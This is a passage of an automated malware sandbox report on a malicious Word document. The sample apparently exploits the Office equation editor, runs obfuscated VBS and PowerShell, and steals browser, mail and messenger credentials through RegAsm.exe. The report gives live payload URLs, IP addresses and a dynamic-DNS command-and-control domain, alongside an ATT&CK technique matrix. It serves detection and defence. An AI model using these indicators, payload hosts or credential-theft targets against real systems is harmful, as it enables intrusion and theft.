            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword14_2_004033F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword14_2_00402DB3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword14_2_00402DB3
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3512, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.powershell.exe.446d080.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.powershell.exe.446d080.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.375856894.0000000004148000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3220, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe8_2_0040569A
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting
            Valid Accounts11
            Windows Management Instrumentation
            221
            Scripting
            1
            DLL Side-Loading
            11
            Deobfuscate/Decode Files or Information
            2
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services11
            Archive Collected Data
            15
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts11
            Native API
            1
            DLL Side-Loading
            1
            Bypass User Account Control
            2
            Obfuscated Files or Information
            211
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts43
            Exploitation for Client Execution
            1
            Windows Service
            1
            Access Token Manipulation
            1
            Install Root Certificate
            2
            Credentials in Registry
            1
            System Service Discovery
            SMB/Windows Admin Shares2
            Email Collection
            3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts223
            Command and Scripting Interpreter
            Login Hook1
            Windows Service
            1
            DLL Side-Loading
            3
            Credentials In Files
            4
            File and Directory Discovery
            Distributed Component Object Model211
            Input Capture
            214
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts2
            Service Execution
            Network Logon Script422
            Process Injection
            1
            Bypass User Account Control
            LSA Secrets39
            System Information Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable Media2
            PowerShell
            RC ScriptsRC Scripts1
            Masquerading
            Cached Domain Credentials13
            Security Software Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Modify Registry
            DCSync21
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Virtualization/Sandbox Evasion
            Proc Filesystem4
            Process Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Access Token Manipulation
            /etc/passwd and /etc/shadow1
            Application Window Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron422
            Process Injection
            Network Sniffing1
            System Owner/User Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
            Remote System Discovery
            Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1483047 Sample: girlfrnd.doc Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Antivirus detection for URL or domain 2->81 83 23 other signatures 2->83 13 WINWORD.EXE 291 13 2->13         started        process3 process4 15 EQNEDT32.EXE 12 13->15         started        20 EQNEDT32.EXE 13->20         started        dnsIp5 71 104.168.45.34, 49163, 49165, 80 AS-COLOCROSSINGUS United States 15->71 53 createdthingstobefrankwithmeeverywhe.vBS, Unicode 15->53 dropped 73 Office equation editor establishes network connection 15->73 75 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 15->75 22 wscript.exe 1 15->22         started        file6 signatures7 process8 signatures9 101 Suspicious powershell command line found 22->101 103 Wscript starts Powershell (via cmd or directly) 22->103 105 Obfuscated command line found 22->105 107 4 other signatures 22->107 25 powershell.exe 12 5 22->25         started        process10 dnsIp11 59 198.46.176.133, 49164, 80 AS-COLOCROSSINGUS United States 25->59 109 Suspicious powershell command line found 25->109 111 Obfuscated command line found 25->111 113 Very long command line found 25->113 115 3 other signatures 25->115 29 RegAsm.exe 3 13 25->29         started        signatures12 process13 dnsIp14 65 iwarsut775laudrye2.duckdns.org 29->65 67 iwarsut775laudrye2.duckdns.org 192.253.251.227, 49166, 49167, 49168 THORDC-ASIS United States 29->67 69 geoplugin.net 178.237.33.50, 49169, 80 ATOM86-ASATOM86NL Netherlands 29->69 55 C:\Users\user\AppData\Roaming\sfvnspt.dat, data 29->55 dropped 57 C:\Users\user\AppData\...\Forfrelsens.vbs, ASCII 29->57 dropped 125 Contains functionality to bypass UAC (CMSTPLUA) 29->125 127 Tries to steal Mail credentials (via file registry) 29->127 129 Potential malicious VBS script found (suspicious strings) 29->129 133 7 other signatures 29->133 34 wscript.exe 3 29->34         started        37 RegAsm.exe 1 29->37         started        39 RegAsm.exe 29->39         started        41 2 other processes 29->41 file15 131 Uses dynamic DNS services 65->131 signatures16 process17 signatures18 85 Suspicious powershell command line found 34->85 87 Wscript starts Powershell (via cmd or directly) 34->87 89 Obfuscated command line found 34->89 99 2 other signatures 34->99 43 powershell.exe 34->43         started        91 Tries to steal Instant Messenger accounts or passwords 37->91 93 Tries to steal Mail credentials (via file / registry access) 37->93 95 Searches for Windows Mail specific files 37->95 97 Tries to harvest and steal browser information (history, passwords, etc) 39->97 process19 dnsIp20 61 asociatiatraditiimaria.ro 93.113.54.56, 443, 49171, 49172 GTSCEGTSCentralEuropeAntelGermanyCZ Romania 43->61 63 new.quranushaiqer.org.sa 34.166.62.190, 443, 49173 ATGS-MMD-ASUS United States 43->63 117 Suspicious powershell command line found 43->117 119 Obfuscated command line found 43->119 121 Very long command line found 43->121 123 Installs new ROOT certificates 43->123 47 powershell.exe 43->47         started        49 cmd.exe 43->49         started        signatures21 process22 process23 51 cmd.exe 47->51         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            girlfrnd.doc100%AviraHEUR/Rtf.Malformed
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.imvu.comr0%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
            https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%URL Reputationsafe
            https://gmpg.org/xfn/110%URL Reputationsafe
            http://geoplugin.net/json.gp/C0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://login.yahoo.com/config/login0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            https://asociatiatraditiimaria.ro/feed/0%Avira URL Cloudsafe
            http://crl.entrust.net/server1.crl00%URL Reputationsafe
            http://www.imvu.com0%URL Reputationsafe
            https://api.w.org/0%URL Reputationsafe
            https://support.google.com/chrome/?p=plugin_flash0%Avira URL Cloudsafe
            https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=10%Avira URL Cloudsafe
            http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png0%Avira URL Cloudsafe
            http://acdn.adnxs.com/ast/ast.js0%Avira URL Cloudsafe
            http://b.scorecardresearch.com/beacon.js0%Avira URL Cloudsafe
            http://www.imvu.com/HK0%Avira URL Cloudsafe
            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_0%Avira URL Cloudsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
            http://geoplugin.net/json.gp0%URL Reputationsafe
            https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=90%Avira URL Cloudsafe
            https://secure.comodo.com/CPS00%URL Reputationsafe
            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
            http://www.ebuddy.com0%URL Reputationsafe
            http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html0%Avira URL Cloudsafe
            https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm100%Avira URL Cloudphishing
            http://198.46.176.1330%Avira URL Cloudsafe
            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
            https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=17207637670%Avira URL Cloudsafe
            https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.10%Avira URL Cloudsafe
            http://pr-bh.ybp.yahoo.com/sync/msft/16145220553121086830%Avira URL Cloudsafe
            http://cache.btrll.com/default/Pix-1x1.gif0%Avira URL Cloudsafe
            https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=0%Avira URL Cloudsafe
            http://www.nirsoft.net0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://o.aolcdn.com/ads/adswrappermsni.js0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpoUfw0%Avira URL Cloudsafe
            http://cdn.taboola.com/libtrc/msn-home-network/loader.js0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpdUfw0%Avira URL Cloudsafe
            http://static.chartbeat.com/js/chartbeat.js0%Avira URL Cloudsafe
            http://www.msn.com/?ocid=iehp0%Avira URL Cloudsafe
            https://asociatiatraditiimaria.ro0%Avira URL Cloudsafe
            https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=10330%Avira URL Cloudsafe
            http://www.msn.com/de-de/?ocid=iehp0%Avira URL Cloudsafe
            https://asociatiatraditiimaria.ro/os/transportment.pfm100%Avira URL Cloudmalware
            http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIFj0%Avira URL Cloudsafe
            http://p.rfihub.com/cm?in=1&pub=345&userid=16145220553121086830%Avira URL Cloudsafe
            http://104.168.45.340%Avira URL Cloudsafe
            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%0%Avira URL Cloudsafe
            http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIF100%Avira URL Cloudmalware
            http://www.nirsoft.net/0%Avira URL Cloudsafe
            https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%30%Avira URL Cloudsafe
            https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm$100%Avira URL Cloudphishing
            https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=90%Avira URL Cloudsafe
            http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(0%Avira URL Cloudsafe
            http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js0%Avira URL Cloudsafe
            https://www.ccleaner.com/go/app_cc_pro_trialkey0%Avira URL Cloudsafe
            http://198.46.176.133/Upload/vbs.jpeg100%Avira URL Cloudmalware
            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh0%Avira URL Cloudsafe
            http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIFu0%Avira URL Cloudsafe
            https://asociatiatraditiimaria.ro/comments/feed/0%Avira URL Cloudsafe
            https://contextual.media.net/0%Avira URL Cloudsafe
            https://contextual.media.net/8/nrrV73987.js0%Avira URL Cloudsafe
            http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js0%Avira URL Cloudsafe
            https://asociatiatraditiimaria.ro/wp-json/0%Avira URL Cloudsafe
            http://ns.adobede0%Avira URL Cloudsafe
            http://www.msn.com/0%Avira URL Cloudsafe
            https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%20%Avira URL Cloudsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
            http://new.quranushaiqer.org.sa100%Avira URL Cloudmalware
            https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.20%Avira URL Cloudsafe
            http://cdn.at.atwola.com/_media/uac/msn.html0%Avira URL Cloudsafe
            https://new.quranushaiqer.org.sa100%Avira URL Cloudmalware
            https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
            http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset0%Avira URL Cloudsafe
            http://104.168.45.34/59/LMTS.txt0%Avira URL Cloudsafe
            http://go.microsoft.c0%Avira URL Cloudsafe
            https://policies.yahoo.com/w3c/p3p.xml0%Avira URL Cloudsafe
            http://www.msn.com/advertisement.ad.js0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            199.232.214.172
            truefalse
              unknown
              asociatiatraditiimaria.ro
              93.113.54.56
              truefalse
                unknown
                geoplugin.net
                178.237.33.50
                truefalse
                  unknown
                  iwarsut775laudrye2.duckdns.org
                  192.253.251.227
                  truetrue
                    unknown
                    new.quranushaiqer.org.sa
                    34.166.62.190
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfmfalse
                      • Avira URL Cloud: phishing
                      unknown
                      https://asociatiatraditiimaria.ro/os/transportment.pfmfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIFtrue
                      • Avira URL Cloud: malware
                      unknown
                      iwarsut775laudrye2.duckdns.orgtrue
                        unknown
                        http://198.46.176.133/Upload/vbs.jpegfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://geoplugin.net/json.gpfalse
                        • URL Reputation: safe
                        unknown
                        http://104.168.45.34/59/LMTS.txttrue
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://b.scorecardresearch.com/beacon.jsbhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://acdn.adnxs.com/ast/ast.jsbhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.imvu.comrRegAsm.exe, 0000000F.00000002.414488484.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.imvu.com/HKRegAsm.exe, 0000000F.00000002.414353450.00000000002CC000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://asociatiatraditiimaria.ro/feed/powershell.exe, 00000010.00000002.886556613.000000000313F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.886556613.000000000315C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ocsp.entrust.net03wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contoso.com/Licensepowershell.exe, 00000006.00000002.375856894.0000000003539000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 0000000C.00000002.424356325.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.diginotar.nl/cps/pkioverheid0wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.nirsoft.netRegAsm.exe, 0000000C.00000002.422894138.00000000001D4000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=powershell.exe, 00000010.00000002.886556613.000000000313F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.886556613.000000000315C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://deff.nelreports.net/api/report?cat=msnbhv2E13.tmp.12.drfalse
                        • URL Reputation: safe
                        unknown
                        https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhv2E13.tmp.12.drfalse
                        • URL Reputation: safe
                        unknown
